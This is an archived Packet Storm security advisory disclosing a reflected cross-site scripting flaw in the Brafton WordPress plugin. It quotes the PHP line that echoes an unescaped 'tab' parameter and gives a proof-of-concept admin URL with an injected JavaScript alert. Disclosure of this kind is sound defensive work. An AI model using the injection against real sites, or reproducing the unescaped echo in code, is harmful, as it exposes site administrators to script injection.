Twenty Year Anniversary

WordPress Brafton 3.3.10 Cross Site Scripting

WordPress Brafton 3.3.10 Cross Site Scripting
Posted May 20, 2016
Authored by Mehrdad Linux

WordPress Brafton plugin version 3.3.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 4e2d68415f0db9c56c5926c106bd3297

WordPress Brafton 3.3.10 Cross Site Scripting

Change Mirror Download
# Exploit Title :  Vulnerabilitie XSS in brafton WordPress Plugin
# Date: Fri May 20 2016
# Reported Date : Fri May 20 2016
# Vendor Homepage: http://www.brafton.com/support/wordpress/
# Version: v3.3.10 – January2016
# Software Link:
https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Fix/Patching : Update To
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------

brafton WordPress Plugin v3.3.10 – January2016


2. BACKGROUND
-------------------------
this is WordPress Plugin for Brafton

Brafton is a content marketing agency.
Our in-house teams develop and execute SEO-optimized content strategies,
from news to infographics


3. DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php

in line 11 :
tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo
0;}?>;

wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))


4. discovered by :
-------------------------

The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and
Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com


5 .LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close